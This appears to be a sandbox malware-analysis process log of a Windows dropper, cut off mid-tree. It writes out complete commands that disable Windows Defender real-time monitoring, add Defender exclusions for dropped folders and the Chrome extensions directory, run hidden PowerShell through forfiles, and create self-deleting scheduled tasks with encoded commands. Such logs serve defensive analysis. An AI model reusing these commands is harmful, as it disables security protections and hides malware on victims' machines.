C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2256
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2928
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
PID:2996 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2968
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2992
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2840 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2852
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:1936
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Indirect Command Execution
PID:2440 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2960
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2912 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2932
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZiwnOgGX" /SC once /ST 12:41:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZiwnOgGX"3⤵
- System Location Discovery: System Language Discovery
PID:576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZiwnOgGX"3⤵PID:1656
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:848
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2792 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1776
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRKIvwZpR" /SC once /ST 01:14:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRKIvwZpR"3⤵
- System Location Discovery: System Language Discovery
PID:692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRKIvwZpR"3⤵PID:2256
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
- Indirect Command Execution
PID:2128 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
- System Location Discovery: System Language Discovery
PID:2340 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2592 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RDPbNEzdUsgCtKDC" /t REG_DWORD /d 0 /reg:323⤵PID:608
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RDPbNEzdUsgCtKDC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RDPbNEzdUsgCtKDC" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1992 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RDPbNEzdUsgCtKDC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RDPbNEzdUsgCtKDC" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1748 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RDPbNEzdUsgCtKDC" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RDPbNEzdUsgCtKDC" /t REG_DWORD /d 0 /reg:643⤵PID:2416
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RDPbNEzdUsgCtKDC" /t REG_DWORD /d 0 /reg:644⤵PID:1988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\RDPbNEzdUsgCtKDC\ofjeGdoA\wzNdqNBCHkmLuOTH.wsf"3⤵PID:720
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\RDPbNEzdUsgCtKDC\ofjeGdoA\wzNdqNBCHkmLuOTH.wsf"3⤵
- Modifies data under HKEY_USERS
PID:3036 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GfzXWCCsFRMrC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GfzXWCCsFRMrC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HpnMghYRHBUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HpnMghYRHBUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VVgdUZLbU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VVgdUZLbU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XgywPJLnIuIbRuigTDR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XgywPJLnIuIbRuigTDR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bvOaypMPnvJU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bvOaypMPnvJU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VhLijRxUJlqjyVVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VhLijRxUJlqjyVVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\FuIjCdrlnqMUsEOBh" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\FuIjCdrlnqMUsEOBh" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RDPbNEzdUsgCtKDC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RDPbNEzdUsgCtKDC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GfzXWCCsFRMrC" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:1960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GfzXWCCsFRMrC" /t REG_DWORD /d 0 /reg:644⤵PID:1664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HpnMghYRHBUn" /t REG_DWORD /d 0 /reg:324⤵PID:1592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HpnMghYRHBUn" /t REG_DWORD /d 0 /reg:644⤵PID:1304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VVgdUZLbU" /t REG_DWORD /d 0 /reg:324⤵PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VVgdUZLbU" /t REG_DWORD /d 0 /reg:644⤵PID:936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XgywPJLnIuIbRuigTDR" /t REG_DWORD /d 0 /reg:324⤵PID:2400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XgywPJLnIuIbRuigTDR" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bvOaypMPnvJU2" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:1064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bvOaypMPnvJU2" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VhLijRxUJlqjyVVB" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VhLijRxUJlqjyVVB" /t REG_DWORD /d 0 /reg:644⤵PID:2164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\FuIjCdrlnqMUsEOBh" /t REG_DWORD /d 0 /reg:324⤵PID:2992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\FuIjCdrlnqMUsEOBh" /t REG_DWORD /d 0 /reg:644⤵PID:2136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RDPbNEzdUsgCtKDC" /t REG_DWORD /d 0 /reg:324⤵PID:2944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RDPbNEzdUsgCtKDC" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2588
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gMiODmsqg" /SC once /ST 01:15:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gMiODmsqg"3⤵
- System Location Discovery: System Language Discovery
PID:2020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gMiODmsqg"3⤵
- System Location Discovery: System Language Discovery
PID:1736
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:712
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:756
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2812
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FjXDdrejgGyCBhByH" /SC once /ST 11:08:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RDPbNEzdUsgCtKDC\OgrLWgxFqepUBPX\glADGjJ.exe\" Pl /iveydidSD 385121 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2288
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FjXDdrejgGyCBhByH"3⤵
- System Location Discovery: System Language Discovery
PID:884
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2636 -s 6323⤵
- Loads dropped DLL
- Program crash
PID:2556
-
-
-
C:\Windows\Temp\RDPbNEzdUsgCtKDC\OgrLWgxFqepUBPX\glADGjJ.exeC:\Windows\Temp\RDPbNEzdUsgCtKDC\OgrLWgxFqepUBPX\glADGjJ.exe Pl /iveydidSD 385121 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2336 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:880
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:344 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1796
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2232
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2428 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:996
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:620
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
PID:372 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:584 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:320
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1584 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1752
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:3032
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Indirect Command Execution
PID:1608 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- System Location Discovery: System Language Discovery
PID:2368 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:536 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2868
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bHuqaEPbhrVtHIaGbF"3⤵PID:2860
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵
- System Location Discovery: System Language Discovery
PID:2548 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
- Indirect Command Execution
PID:3068 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- System Location Discovery: System Language Discovery
PID:1864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
